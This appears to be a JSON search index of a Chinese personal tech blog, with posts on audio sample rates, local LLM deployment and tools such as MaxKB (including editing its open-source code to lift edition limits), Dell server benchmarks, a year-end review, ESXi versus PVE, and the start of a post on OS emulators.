于是我搜了一下，Mac默认输出的声音貌似只有44100Hz的采样率，需要在“音频MIDI设置”中将扬声器输出的格式改成更高的才能播放更高的频率。不过这也挺奇怪的，44.1kHz的最高频率是22kHz啊，为什么会在20kHz那里砍一刀呢？看香农采样定理所说的是大于等于，也许就是这个原因吧？既然我的音乐都是96kHz采样率的音乐，那么我就应该把这里的设置改成一样的。改完之后又测试了一下，发现确实是突破了20kHz，但好像没有超过22kHz，不过至少没有“砍一刀”的痕迹了，也许是音乐本身就是这样，或者是扬声器最高只能到这个水平了吧。其实我也没有那么追求HiFi，能到这样我已经很满意了。感想虽然对人来说也许听HiFi并不能听出来什么，但是追求HiFi还是挺有意思的，毕竟提高还原程度是可以通过可视化的方式看到的，既然如此，那就是有追求的价值。看不见的东西是玄学，可以不去追求，但是HiFi是实实在在存在的，这样也就能理解为什么会有人花大价钱去买各种昂贵的设备来提高还原度了，因为这是真的可以起到作用的啊……当然对我来说，能0成本做到尽可能的HiFi才是最重要的，花钱达到HiFi就没什么必要了🤣。" },{ "title": "近期LLM的部署与应用经历(2)", "category": "", "tags": "LLM, AI, 人工智能", "url": "/2025/03/08/llm2.html", "date": "2025/03/08", "content": "最近AI发展好快啊～起因自从上次写完文章之后，最近这段时间LLM圈又有了不少更新，感觉很值得试试看。所以这次就来看看这些新东西有什么特别的地方吧。关于阿里QwQ模型的体验前两天阿里的推理模型QwQ模型更新到正式版了，不过其实我也没试过他们的预览版效果怎么样……但按照他们的说法，他们的32b参数的模型水平已经相当于DeepSeek-R1 671b的模型了。如果真是这样，那就太好了，毕竟那个671b参数的模型部署难度还是相当大的，在当时想部署一个能用级别的还是挺烧钱的。但如果这个32b参数的模型能达到相同水平，那就完全没有必要买那么贵的硬件了。像上次买的RTX4090 48GiB显存魔改版可以轻松跑QwQ 32b Q8量化的版本（速度能达到23T/s），就算想跑没有量化的fp16版，也只需要再买一张RTX4090 48GiB就够了，这个成本相比DeepSeek-R1低太多了。   所以刚发布的那天我下午就把模型下载下来试了试，随便试了几个问题，答得效果确实不错，我对比了一下DeepSeek-R1，试了试“世界上最长的单词中哪个字母最多”这个问题，两边回答的格式几乎一样，都说的是“硅肺病”的英文，并且都进行了字母数量分析，主要的结论都分析正确了，但是第二多和第三多的字母数量两边说的都不完全正确。另外我还试了试DeepSeek-R1的14b和70b蒸馏版，虽然回答正确了，但是并没有分析具体字母的数量，所以从这一点来看确实是和DeepSeek-R1的水平很相似。不过后来我又让其他人试了试文本分析之类的能力，似乎没能达到他们的预期，另外我还测了测比较宽泛的问题，以及解析文本之类的问题，结果很多问题没能正确回答……所以还是不能和DeepSeek-R1相比较，不过相比DeepSeek-R1各个蒸馏版的水平还是强了不少的，至少没有出现在回答结果中随机输出英文的情况，但是偶尔会出现没有闭合标签“</think>”的情况，看起来应该不能用于生产环境……要想正经用还是得用完整版的DeepSeek-R1，但毕竟成本问题还是很大啊……所以如果需要考虑成本问题的话用QwQ还是很不错的选择。   不过QwQ相比DeepSeek-R1还有一个优势，那就是支持Agent能力，原生支持调用用户提供的函数，像它虽然解析文本的能力不怎么强，但是它可以调用工具来处理，而DeepSeek-R1要想支持就得写提示词，但是毕竟没有专门训练过，不一定能正确使用工具（虽然我没试过😝）。   另外说到Agent，好像有个叫“Manus”的产品挺火？但那个我实在没兴趣，一点技术含量都没有，还搞什么邀请码，一看就是买的水军，而且还被人不到一天时间实现了开源版OpenManus，给人笑掉大牙了🤣。关于新出的Mac Studio的看法搭完整版的DeepSeek-R1即使是使用上次所说的KTransformers框架也是相当费钱的，最起码也得10万CNY左右。但最近几天苹果出了新的Mac Studio，最高配的M3 Ultra可以选配512GiB的内存，可以轻松跑DeepSeek-R1 671b Q4_K的版本，然后价格最低仅需7.5万CNY。我之前还想着是出M4 Ultra呢……结果出了个M4 Max，不过新的Mac Studio出的速度比我预期的快了好多，我本来以为会在WWDC25的时候出呢……看来是想借DeepSeek-R1大卖一波，当然从这个产品来说确实应该是会大卖的，回头看看能不能搞一个来。不过现在才刚开售，还没人拿到实物呢，也没人实机跑一下，所以先等等最早买到的人跑一波看看，如果效果好的话也许能整一个呢……关于如何查看MaxKB的完整接口文档上一篇文章我说明了一下如何解除MaxKB用户、应用以及知识库的数量限制，后来我发现它还限制了社区版查看完整API文档的能力😅，这个限制给我看的那叫一个大开眼界，它居然还给这个文档整了个硬编码的密码，从来没见过这么搞开源的，具体就是这一行。虽然我不知道这里面提到的MD5对应的密码是多少，但是既然是开源代码，我把这句话删了不就行了……不过实际上不太行，因为它使用了Django的国际化功能，直接删掉会影响这个文件的行数，程序会报错。不过可以仔细看一下关于“init_chat_doc”这一行在密码的判断后面加了个“or True”，看来是MaxKB的开发者后来应老板要求放开“chat_doc”的限制，但是又懒得改国际化那边的东西所以加的这个吧🤣，那既然这样，我直接给“init_app_doc”对应的那句话也加个“or True”不就行了，加完之后打开“/doc/”路径，就可以看到MaxKB的完整API文档了，不需要自己手动再去抓包测试了。   至于其他的专业版功能我看了一下应该确实是需要用到XPACK包的（不过其实关于修改页面风格的前端开源了，后端在XPACK里，要想用得自己实现接口），开源的这部分最多只能到这里了，估计是这些限制没法单独搞一个包，所以他们就直接在开源代码上做限制😅，看来他们老板也是没眼力啊。   其实与其余用MaxKB，不如用Dify，至少它没有在代码里塞莫名其妙的东西来恶心人，文档也相对更完备，不过它目前还是相当的不成熟，有很多BUG，比如上传知识库显示支持Excel，但是解析的时候会失败，上传知识库如果通过改配置超过15M解析也会失败，还有它的插件很多也是不能用，比如目前阿里云的百炼会报错，退回上个版本就不支持思维链的展示等等……总之不太适合生产使用。感想现在的AI发展确实是快啊，才几天时间又有一堆有意思的发展，应该说现在很多公司都在趁这个机会来发布自己的产品吧，感觉现在也是一个能有很多机会的时刻，不过AI对研究能力的要求也是相当高的，想在这个时间蹭热度也得有相当厉害的能力……像阿里的水平也是相当强的，可惜营销水平不太行😆。只是像我应该也只能看着大公司的百花齐放吧，看看接下来的时间还会不会出现一些有意思的东西。" },{ "title": "近期LLM的部署与应用经历", "category": "", "tags": "LLM, AI, 人工智能", "url": "/2025/02/22/llm.html", "date": "2025/02/22", "content": "玩AI开始变的有些烧钱了啊……起因在几年前我就已经探索并玩过很多LLM了，不过近些日子在这方面的发展似乎影响到了我的生活……由于近期某公司开发的DeepSeek在国内非常火，导致我也不得不跟上这个热潮去考虑怎么应用它。当然对于普通人来说，使用它并没有什么难度，即使DeepSeek的官方网站和APP现在基本不能用，现在各家大公司也都自行搭建了，目前我感觉使用DeepSeek体验最好的是百度，其他家使用无论是可用性还是速度都比不过百度，而且目前百度也没有限制使用量之类，还是挺不错的。   但是对我来说却不能直接使用其他公司的产品，其实要从成本来说接入其他公司的接口显然是要便宜的多，但是我需要应用的地方可能连不上那些接口😅，所以需要考虑自己搭建。部署经历为了能自己搭建DeepSeek，首先就得买硬件了……虽然前段时间整了台新服务器，但是让CPU来跑还是太吃力了，速度太慢了……所以为了能轻松的跑起来，最近整了张RTX4090 48GiB显存魔改版（但是手头没有空闲的机器了，只能插在一台用着i5-8400处理器的主机，这下成狗骑吕布了🤣）。有了这张显卡，跑DeepSeek-R1的蒸馏模型（从1.5B到70B的Q4_K_M量化版）倒是轻轻松松，用Ollama跑70B的模型也能到20Tps的速度。但是根据测试来看，这些蒸馏模型的效果很差，基本上没法用，这些模型经常会发生不遵守指令，内容随机掺杂英文，而且也经常发生逻辑错误，和671B的完整版完全不能比，用起来还不如Qwen2.5各规模的模型。   那怎么办呢？前几天清华大学的某个团队更新了一款叫做KTransformers的框架，据说它可以利用Intel的AMX指令集然后配一张RTX4090可以让DeepSeek-R1 671B Q4_K_M量化版跑到13Tps，能跑到这个速度那至少是可用级别了，调其他公司的接口基本上也就是这个速度，之前买的新服务器不就有这个指令集嘛（之前还感觉这个指令集有点鸡肋呢，看来还是开发度不够啊😆），如果再配一个CPU，然后把内存插满也许就可以了？可惜R760xs插不了全高的显卡，要想插全高的估计就只能买R760了，或者用PCI-E延长线？不过那样感觉不太可靠……不过之后肯定还是会想办法上完整版的模型，毕竟它的效果确实是不错，最关键的是它的市场认可度高，上了就能提高产品竞争力，所以之后应该会想办法搞到满足KTransformers的硬件然后跑起来，或者等llama.cpp合并它的算法，然后用llama.cpp会更好一些。   不过我更倾向于等Mac Studio M4 Ultra出来，应该过几个月就能出，按照目前发展趋势来看，新款Mac Studio应该会有更大的内存，理论上可以跑的动一些效果更好的动态量化版（现在能在M2 Ultra上跑的那个1.58位的效果还是不太行），相比于价格十几万的服务器，Mac Studio估计不到十万，可以说是非常有性价比了。当然如果等不及的话应该还是会选择花十几万买个有双路第四代至强可扩展处理器加512GiB内存的服务器吧……应用经历有了模型之后如果只是聊天那就没必要费这么大劲了，费劲搭当然是为了能让它参与到实际的工作当中。不过该如何应用它呢？首先要让它知道工作的内容，所以第一步要搞出知识库。知识库的原理倒是很简单，我之前就给我博客的聊天机器人加了RAG功能，核心就是嵌入模型和向量数据库。不过我写的那个全都是为了能使用Cloudflare的功能，脱离了Cloudflare就没用了。那如果要在本地搞应该怎么办呢？我之前用过的1Panel开发它的公司旗下有个叫MaxKB的产品看起来很不错，它使用了PGSQL和pgvector作为向量数据库来搭建知识库，而且它是用Python写的，还能用Python来写自定义功能的函数库，另外它还能用可视化的方式来设计工作流，可以轻松构建需要的逻辑，从功能上来说我还是挺满意的。   使用也挺简单，在设置里可以添加使用其他公司API的模型，也可以使用Ollama，不过这一步有个坑，Ollama并不支持设置API Key，但是它添加模型却要求配置一个API Key，文档说可以输入任意内容，我输了一个空格，可以保存，但是使用的时候会报网络错误，所以它文档里怎么不说明一下是除了空格之外的任意内容😅，浪费了我不少时间。   在添加知识库的时候可以除了内置的嵌入模型（好像是腾讯的员工搞的模型），也可以用Ollama的嵌入模型。它自带的嵌入模型用的是CPU，文档规模大的情况速度比较慢，因为在Cloudflare上我用的是BAAI的BGE模型，效果还可以，所以这次我还是选了它，但是选的是中文模型，这样就不需要再翻译了🤣。   开始我对MaxKB印象还是挺不错的，但是用着用着……在建第六个应用的时候它显示社区版只能创建五个应用😅，对于开源软件这样做限制我也是大开眼界了，要是说有些专业版功能不开源，是DLC的形式，付钱来获取更多的功能代码，我还能理解，在开源代码上做数量上的限制，这垃圾公司多少有点看不起人了😅。   那对于这种挑衅行为该怎么反制呢？它的代码倒是没有混淆之类的，还算不错，比我以前用过的KodExplorer要好，它还整个“部分开源”，有个关键文件直接是混淆过的，想改都改不了😅，至少MaxKB还能随便改。   我大概看了眼代码，只需要改两个文件就行，一个是“apps/common/util/common.py”，把其中“valid_license”函数进行判断的部分全部注释，另外一个文件是“apps/setting/serializers/valid_serializers.py”，把“ValidSerializer”方法中的“valid”方法里进行判断的部分全部注释就可以了，开源还做限制我是真的无法理解……   如果是用1Panel部署的，可以把那两个文件放到“/opt/1panel/apps/maxkb/maxkb”目录下，然后在docker-compose.yml文件的volumes段添加：- ./common.py:/opt/maxkb/app/apps/common/util/common.py- ./valid_serializers.py:/opt/maxkb/app/apps/setting/serializers/valid_serializers.py就可以了。   不过总体来说从功能上我还算比较满意，就原谅它搞出这种奇葩的行为吧😆。   MaxKB主要是为了能给更多人使用，所以是网页版，部署也略显麻烦，如果是自己用呢？我之前看到过一个桌面软件，叫做Cherry Studio。它更适合开箱即用一些，功能上可能不如MaxKB强大，但是比较方便一些。比如上传文档，MaxKB需要在流程图中自行处理，这个软件会帮你处理好；添加知识库可以直接添加本地的文件夹，不用上传到服务器上；另外安装比较方便，不像MaxKB搭环境比较麻烦些，所以个人用的话可以用Cherry Studio。感想总的来看，DeepSeek的出现还算可以，虽然它受到的关注和它的能力也许并不匹配，但是毕竟现在的它已经是人人都能蹭的东西了，谁都能挂它的名头，我们来蹭一蹭也能分点它的好处。当然这样的结果倒也不差，开发DeepSeek的公司只能获得他们应得的部分，其他的关注度就应该被各家公司瓜分😆。我在这期间虽然很难获得什么实质性的收获，但是能在这期间能搞点很贵的硬件之类的玩玩也是不错的体验啊🤣。" },{ "title": "新旧服务器的使用体验与对比", "category": "", "tags": "服务器, Dell, 使用体验", "url": "/2025/02/09/server.html", "date": "2025/02/09", "content": "花更多钱可以收获更多吗？起因最近由于某些原因需要买点服务器，从我平时用的东西来看，其实很多年前的产品就已经满足大多数应用了，业务的发展跟不上时代的发展，就根本不需要更好的性能。所以既然要买服务器，还是买洋垃圾比较好，那些淘汰下来的服务器特别便宜。虽然这么说，但是我也好奇现在的技术到底发展到一个什么样的程度，所以也整个新的服务器玩玩吧。选择服务器那选哪个服务器比较合适呢？我在大学里用过R730，那款服务器给我留下的印象很不错，拆装很方便，也有很好用的带外管理功能（iDRAC），现在的R730已经非常便宜了，我看了看CPU觉得既然洋垃圾很便宜，那就要选个厉害的CPU，最终我选择了双路20核40线程的英特尔® 至强® 处理器 E5-2698 v4，总共40核80线程，另外配了4根32GiB 2400MT/s的DDR4内存，看起来参数还是挺唬人的🤣，而且价格才2k多CNY，感觉还挺不错。   那新的用啥呢？我上Intel的官网看了看，至强6是现在最新的Intel服务器CPU，至于AMD的……主要是给我买服务器的人不喜欢AMD🤣，所以只能选Intel的。既然旧的选了Dell，新的也选Dell吧，我看搭载至强6的戴尔服务器是R770，但是目前还买不到😅，而且价格贵的吓人。次一级就是R760，可以上第四或第五代至强可扩展处理器，不过看了一眼价格也有点贵……但这个机器有个青春版，叫R760xs，也能上第四或第五代至强可扩展处理器，扩展性稍微差一点，但是价格比较便宜，他们管这叫“成本优化版”。最终选来选去选了个单路16核32线程的英特尔® 至强® Gold 6426Y 处理器，外加4条16GiB 4800MT/s的DDR5内存，总共花了将近4wCNY，感觉还是相当贵啊……使用体验与对比服务器拿到手之后自然要先跑个分，我给新服务器安装了Ubuntu Server 24.04，旧的因为核心数多感觉应该能干点别的所以安装了Vmware ESXi 6.7，然后在上面安装了个Ubuntu Server 24.04的虚拟机。跑分用的是sysbench。最终新的服务器单核跑分2853.45events/s，多核47054.35events/s，旧服务器单核876.22events/s，多核52792.15events/s。从这里来看这个新服务器让人非常失望啊，单核才3倍多点差距，尤其我试了试13代i5的单核跑分能到4290.80events/s，家用的处理器可是要便宜的多啊。多核虽然说16核比40核少了点，能跑出差不多的分数已经很厉害了，但是考虑到这两个服务器20倍的价格差，还是深深的感到不值啊……   当然服务器的性能并不是它的优势，扩展性才是，但是R730的定位比R760xs的定位要高啊😂，扩展性显然是旧服务器更强……那新服务器就没什么优势了吗？倒也不是，新服务器的处理器至少把漏洞都修完了，除了幽灵漏洞之外，至少不受其他漏洞影响，安全性更强了。旧处理器和酷睿5代是同一个时代的，所以会受各种CPU漏洞的影响。不过这个服务器又不会当云服务器租给别人用，有没有漏洞根本无所谓啊😅。   那管理性呢？新的带外管理用的是iDRAC9，旧的是iDRAC8，两个界面上差距倒是挺大的，不过功能基本上都差不多，从功能上来看9比8多了个修改BIOS的功能，但是修改完还是得重启才能生效😅，那不如花几十块钱买个企业版订阅然后用虚拟KVM直接重启进BIOS修改呢……不过如果是大规模的话可能是可以统一修改BIOS选项，那就有点意义了，不过对我来说没啥意义😥。   那还有别的优势吗？我看网上说第四、第五代至强可扩展处理器新出了个指令集，叫AMX，可以用来加速AI推理，正好最近国内一个叫DeepSeek-R1的模型挺火的，那就拿来试试看呗，要是这个AMX指令集能大幅提高CPU的推理速度，那我还是挺认同它的价格的，毕竟内存可以随便加，显存……都被老黄垄断了，价格巨贵无比😂。现在的llama.cpp已经支持了AMX加速，具体的使用方法可以看Intel官网上的论文，看起来需要安装Intel oneAPI的库才能编译使用。我折腾了一下编译完跑了一下DeepSeek-R1 32B Q4_K_M蒸馏版，速度大概是5.2token/s。然后我安装了个Ollama，它自带的这个llama服务器只支持AVX2指令集加速，但是我试了一下速度能达到4.8token/s，也就是说AMX指令集加速了个寂寞，几乎没起倒什么作用，难怪没什么人讨论。不过我也听说纯CPU跑大模型主要瓶颈在内存带宽上，我插4条也就是四通道，其实也不是它的全部实力，它最大支持八通道，也许给它插满效果会好一些吧……    那旧服务器呢？我倒也试了一下，用Ollama跑一样的模型大概是2token/s多的速度，也就是说新的相比旧的也只快了1倍多一点，而且旧的每个CPU只有2条内存，只有双通道，速度也只有新的一半，结果新的才领先了一倍多一点，都上了那么多黑科技……看来Intel是真不行了。   当然5.2token/s的速度显然是无法接受的，还是有点慢了，再加上DeepSeek-R1还有思维链，在回答问题前还要生成一堆废话，那就更慢了（其实要我说它那个思维链其实就是把之前的AutoGPT的结果作为训练材料训练的，相当于集成到模型里了，我自己测了一下水平还是不够用，包括官网的满血版也一样）。我之前听说有一种叫做“投机采样”的推理加速技术，不知道为什么凉了，llama.cpp编译的产物里还有这个技术的PoC。于是我就下了个DeepSeek-R1 7B Q4_K_M蒸馏版，拿来试试看用它来加速32B的怎么样。首先我单独测试7B的速度可以达到20token/s，然后我用“llama-speculative”测了一下，感觉有点一言难尽……一阵快一阵慢的，总体来说感觉不如直接跑的快，难怪这个技术凉了😥，不过也可能是因为这两个模型的什么token分布不太一致，毕竟是蒸馏的模型估计还是有点区别，所以体验不太好吧。   那除了大语言模型之外还有什么可测的吗？其实就像我开始说的，要说能满足业务，洋垃圾显然是绰绰有余，尤其还是顶尖的洋垃圾，普通的业务甚至都不能让洋垃圾产生瓶颈，新的不就更不可能了😥……感想从上面来看，新服务器真的没什么优势啊，性能提高了一些，但是价格翻几十倍，当然那些洋垃圾当年也是超级贵的东西，只是被淘汰了所以失去了价值……不过说来这个价值也许并不是服务器硬件本身的价值，“服务”也是很值钱的啊，像那个支持服务（比如远程诊断、上门服务，现场响应之类的）就是它贵的原因吧，二手的旧服务器2019年就结束支持了，新的有3年的支持期，能到2027年，不过我感觉在这支持期内恐怕没有能用到的地方啊，服务器还是挺难坏的，它最值钱的地方似乎只能被浪费掉了🥲。所以总的来说只有行业领先的业务，才配得上最新的服务器，小规模的业务还是用二手服务器吧😆。" },{ "title": "年终总结", "category": "", "tags": "总结", "url": "/2025/01/01/summary.html", "date": "2025/01/01", "content": "All Systems Operational.2024年的状态在过去的一年里，其实相比之前感觉好了一些，工作了一年多感觉什么事情都没有发生。这么看来在上学期间确实是痛苦啊，有人说出了学校会更加痛苦，至少在我看来并没有发生这种事情。不过也正是没有发生什么大事，所以感觉稍微有点无聊，但是我不讨厌，因为我知道刺激的生活并不会有趣，虽然可能会错过一些机会和有趣的事情，但是也降低了碰上危险和讨厌的事情的风险，还是安稳一些比较好。2024年发生的事情虽然这一年里没发生什么大事，不过小事肯定还是有些的。其实我的记忆能力还是一如既往的差，和去年一样，什么都想不起来，现在我顶多能记起半年左右的事情。令我记忆比较深刻的事情大概就是国庆节前后发生的事情，那段时间A股突然大涨，我受到家里人和自己的贪心以及在那之前手头的债券基金跌了一些等影响，入了一点进去，然后第二天就吃了跌停🤣。随后我就退出股市，不打算再玩了。还好之后的A股就再没有起来过（尤其是一年的最后一天再来一次大跌🤣），要不是我当机立断退出，可能就永无天日吧😅（虽然还是亏了不少😥，不过影响不大）。   我平时还是挺节俭的，虽然我知道节约并不能让我更有钱，但节约一点至少可以用的多一些。而自从我上次一天就消费掉几千块钱，什么都没换来之后，我知道了这简直毫无意义，省吃俭用也不如一次大跌。不过我知道了，如果想达成目标，就不要瞎搞，不要考虑投资的事情。但是市场环境仍然需要考虑，不能因为其他人的行为影响到了我的目标，也许换成黄金是最好的选择，只是我仍然没法下定决心，也许只有什么契机才可以吧。在那之前我仍然不会改变我的行为，我还是不会提高我的消费水平😂。   除此之外令我印象比较深刻的事情还是AI，这一年里LLM发展的比我想象的更加厉害，现在各行各业已经全面在用了，成本也比之前低得多，不像之前用AI的成本还稍微有些高，现在基本上都是免费的，而且效果也比之前好很多，像知名AI直播主Neuro-sama的表现相比之前也好多了，逻辑性和整活能力也更强了（虽然我只看切片可能判断上还是有些片面）。至于我因为AI的广泛发展也给我的博客加上了AI摘要，知识库问答 以及相似文章推荐，另外从我做完之后也进行了大力推广让其他站长也用上了我写的AI摘要，也算是对AI发展的回应了。2025年的计划既然2024年没有发生什么特别的事情，那我希望2025年也不要发生什么事情，就像我在2023年的年终总结所说，未来10年都要如一日，工作日上班，下班了玩电脑，休息日睡觉，节假日回家，不要做多余的事情，只要环境没有什么变化，就不要进行多余的操作，这样才能安稳的到达马拉松的终点。   至于其他事情，有趣的研究如果碰上了我依然会去做，做完之后就写篇博客😊。虽然说写多了之前写的我自己可能都忘了，不过总有些有用的东西，可以在我需要的时候进行参考，而且写多了之后拿来训练AI说不定能做一个和我想法一样的AI呢，到时候就可以代替我想问题了😆。" },{ "title": "ESXi和PVE的使用体验与对比", "category": "", "tags": "ESXi, PVE, 虚拟机", "url": "/2024/12/29/vm.html", "date": "2024/12/29", "content": "装虚拟机用什么系统更好呢？起因前段时间我有个需要开很多机器的需求，为了方便管理和提高资源利用率，当然是上虚拟机比较合适。那用什么系统上虚拟机好呢？Windows上用Hyper-V当然也是不错的选择，但是我觉得Windows的基础占用太高了，另外Hyper-V的操作面板也不怎么样，所以就不考虑了。那用什么呢？之前我上大学的时候用过ESXi，在随身携带的U盘里上正好有一份，一直没删，所以就顺手给手头的工作站安了一下。不过我当时用的版本很旧了，是6.7，虽然也不是不能用，但是考虑到这个版本之前有RCE漏洞，所以去sysin上下了一份最终版的6.7U3u更新包更新了上去，以后就不再更新了。   不过除了ESXi之外还有别的选择，我看很多人都拿PVE和ESXi比较。虽然经常听说PVE但是我没有用过，所以就在另一个工作站上安装了PVE试试看哪个用起来更好。不过和PVE比的其实不该是ESXi，而是VMWare vSphere，只不过我两个系统都是一台机器，也用不着搞集群，找破解版还麻烦。所以其实我是拿ESXi的VMware Host Client和PVE进行对比。   另外从本质来说它们也不是一个东西，PVE更像是Debian上一个管理虚拟化的面板，ESXi是VMKernel附带了个可以临时使用的Web端面板，侧重点不一样。ESXi和PVE的对比界面与体验首先从界面来看两个系统长得其实差不太多，不过左侧导航栏有点不太一样，把PVE的导航栏改成文件夹视图就和ESXi的差不多了。从界面上来说我更喜欢ESXi的界面，PVE的感觉没什么设计感。不过PVE面板的数据是1秒刷新一次的，ESXi就算配置刷新也只能最短每15秒刷新一次。从功能上来说可能PVE会更好一点。另外对于显示的图表来说PVE全在“概要”里，在ESXi都在“监控”里，虽然PVE的图表更多，但是有些感觉没什么意义，因为PVE是基于Linux的，所以有“负载”这个指标，不过对于虚拟机系统来说感觉意义不大啊……不过也可能是因为用了LXC容器之后会影响PVE的负载所以整了这个项目？   另外PVE还有个好处是可以看CPU温度，我看有一个叫“pvetools”的工具可以配置在界面上显示CPU频率和温度，ESXi没有IPMI的话用啥办法都看不到CPU温度😅。虚拟机管理ESXi和PVE创建虚拟机都挺简单的，都有专门的向导。不过我测试PVE的时候选择安装Windows 10，它推荐的架构居然是i440fx机器和SeaBIOS固件，虽然也不是不能用，但它怎么选了个最垃圾的，虽然选成Windows 11是推荐的q35和UEFI引导……而且SCSI控制器还选了个要驱动的半虚拟化设备，但PVE没有自带这个驱动包啊，这些都是不小的坑。而ESXi就正常多了，选择Windows 10会默认使用UEFI引导，而且会选择一个兼容性最好的SCSI控制器和网络适配器，便于没有安装驱动的时候能正常使用，另外ESXi是自带VMWare Tools的，在系统安装完成后可以直接挂载安装，比PVE的体验好很多。另外PVE还有一个坑，那就是CPU默认会用QEMU自己的一个类型，那个在虚拟机里就读不到CPU的型号了，而且性能会打折扣。不过这个倒也能理解，毕竟PVE是给集群设计的，在迁移到其他节点的时候选host可能在迁移到不同CPU的节点时会出现问题。不过ESXi也是啊……怎么它就没有这种问题？总之PVE不适合小白。   PVE相比ESXi多了个特性，那就是LXC容器，因为PVE是基于Linux的，所以可以创建容器。这个体验倒是还行，可以直接在面板上下载模版，创建也没什么坑，配好之后和虚拟机几乎一模一样，甚至还能在上面安装Docker，IP也是独立分配的，用起来还不错。存储管理PVE相比ESXi在存储上能选的花里胡哨的东西有点多，默认它会把系统盘配置成LVM，然后单独分了个LVM-Thin的东西，两个容量不互通。这个LVM-Thin好像是只能用来存磁盘，而且看不到东西到底存在哪里了，我搜了一下好像是说这个LVM-Thin可以用多少占多少空间……我寻思qcow2格式的磁盘也有这个功能啊，而且raw格式的磁盘文件是稀疏文件，也是用多少占多少啊……两个容量不互通还浪费磁盘空间，然后我就把这个LVM-Thin删掉了，把系统盘扩容到整个磁盘，然后在存储里面允许local存储磁盘映像之类的。   除此之外PVE还支持ZFS，相当于软RAID，但是它是文件系统层面支持的，不需要初始化。我手头有3块机械盘，插在上面组了个RAIDZ，可以允许坏任意1块。组好之后可以用来存储磁盘映像和容器的数据。   ESXi的话就只能把盘格式化成VMFS6的文件系统，要么还能挂iSCSI当作磁盘或者NFS作为数据存储，如果要分布式存储应该只能搭到别的机器上然后用iSCSI挂过来，阵列看起来只能是硬RAID，ESXi并不提供软RAID的选项，也不支持挂SMB、CephFS、ZFS之类乱七八糟的东西，PVE在这一方面因为基于Linux系统发挥了很大的优势，只要Linux能挂的它就能挂。网络管理在PVE上的网络是用的Linux Bridge，安装的时候会强制要求静态IP，不过毕竟是Linux，可以修改配置让它使用DHCP。不过看起来PVE上似乎没有配置NAT的选项，当然作为Linux来说肯定是有办法配的。ESXi用的叫做虚拟交换机，配置冗余也是在这里配置，PVE的话应该要先配置Bond然后再配置网桥。   另外ESXi对网卡要求很高，不是服务器或者工作站，用的比如什么瑞昱的网卡都是不识别的，要额外安装驱动才行，这也是PVE的优势，Linux兼容什么，它就兼容什么。不过对于大公司来说，也不可能用家用电脑当服务器使🤣，所以就算是用ESXi也不存在这种问题。PCI直通在这一方面ESXi的体验就比PVE要好很多，直接在“管理”——“硬件”——“PCI设备”里面就可以配置显卡直通之类的，没有什么复杂的配置，直接点“切换直通”然后重启就可以在虚拟机里配置了（当然VT-d之类的东西要提前开）。   PVE我最开始配直通的时候是直接网上搜的，那个pvetools也可以帮助配置PCI直通之类的，用这个工具配完之后就可以在虚拟机里添加了。不过在我添加的时候发现它有个“映射的设备”这个选项，用刚才那个工具配置完之后要选“原始设备”，然后我就想着这两个有什么区别，结果发现“数据中心”——“资源映射”里面有个PCI设备的选项😂，也许从一开始我就做错了，直接用这个添加就可以了吧？只不过因为我已经用那个工具配置过了，怕在这里加了会冲突，所以就算啦。   另外PVE的PCI直通还有个好处就是在5-10代的IntelCPU可以用Intel GVT-g技术把核显拆成多个显卡，像虚拟机如果要是需要显卡的话用这个就不用插一堆显卡给虚拟机分配了。ESXi的话只支持SR-IOV拆分，这个只有11代之后的Intel核显才可以用……我用的这两台工作站都是Intel6代的U，所以在ESXi只能把整个核显直通分给某台机器了……硬盘直通硬盘直通有两种方式，一种是把控制器直通了，另外是只直通某个磁盘，在ESXi上叫RDM直通。我的主板只有一个SATA控制器，而且没有NVME硬盘，所以直通控制器肯定不行，这样会导致虚拟机管理系统读不到硬盘然后挂掉，所以要直通就只能直通某个硬盘。   ESXi直通硬盘有点复杂，要打开SSH，然后用命令创建RDM磁盘文件，挂载到虚拟机就可以了。不过我操作的时候不知道为什么网页出BUG了，加载磁盘文件之后什么都读不到，然后也不能保存，最后没办法只能修改vmx文件进行挂载了……   PVE的话我感觉它的直通更像是把整个硬盘的设备文件作为一个磁盘映像来挂载到虚拟机上了，但是PVE不允许在界面上挂载在指定存储以外的文件，所以就只能通过命令来挂载……   两个从功能来说都没问题，不过PVE挂载完之后磁盘显示的是“QEMU HARDDISK”，而且SMART信息是瞎编的，ESXi挂载之后可以看到磁盘名字、序列号，另外SMART信息也能看到（至少我用的ESXi 6.7U3u是可以的）。不过PVE可以在面板上看SMART信息，ESXi就只能登SSH敲命令看了……不过要是有IPMI应该也是能获取到硬盘的健康信息的。总结从上面来看PVE的功能是要更多的，但是使用起来不如ESXi友好，坑也比较多，对于不想花时间解决问题的人来说用ESXi会更好一些，当然ESXi也并不是免费产品，它是VMWare vSphere的一个组件，VMWare vSphere是收费的，而PVE是免费的，可以付费获得额外的更新和服务，对于个人而言当然无所谓，两个肯定都不会有个人花钱买，至于公司的话……大公司选择VMWare vSphere当然会更好一些，肯定对运维会很友好，PVE的话小公司免费用会更合适一点。   至于哪个我觉得更好……我还是更倾向于用ESXi，虽然PVE功能很多，但是毕竟PVE底层是Linux，我怕乱配给配崩了🤣，ESXi的话就没有那么多会让用户搞坏的地方，所以更稳定啊。" },{ "title": "关于OS模拟器的探索", "category": "", "tags": "模拟器, Windows, Android, Linux, macOS", "url": "/2024/12/08/simulator.html", "date": "2024/12/08", "content": "在一个系统模拟另一个系统有多困难呢？起因前段时间我在网上和人聊天的时候谈到了安卓模拟器，在我看来所有除了Linux上可以使用例如Waydroid的容器原生运行Android之外，其他系统只能通过虚拟机的方式运行，毕竟不用虚拟机能在完全不相干的系统上运行安卓我感觉还是挺不可思议的。不过随后就被打脸了🤣，网易在前几年出过一个包含“星云引擎”的安卓模拟器——MuMu Nebula，据说这个模拟器是不需要使用虚拟化技术的。所以这次我打算探索一下这个安卓模拟器和它类似的模拟器。关于虚拟机和模拟器的区别在我看来，模拟硬件的就是虚拟机，模拟软件的就是模拟器。不过现在这些挺难分的，融合的也挺多。比如QEMU+KVM使用硬件虚拟化显然是虚拟机，QEMU System模式使用二进制翻译的方式模拟硬件也是虚拟机，但是QEMU User模式使用了当前系统的资源，没有模拟硬件，所以应该是模拟器（不过也有叫仿真器的？）……不过也许不是这样？模拟指令集也算虚拟了一个CPU吧，像Java虚拟机似乎就是这样，只是单模拟一个CPU叫虚拟机又感觉不太对……并且macOS的Rosetta 2甚至还有硬件加速（硬件模拟x86的内存一致性模型？），还有用了AOT已经翻译完的程序再执行那应该不算模拟器吧……另外还有什么容器之类的……搞得这些概念很难分清。   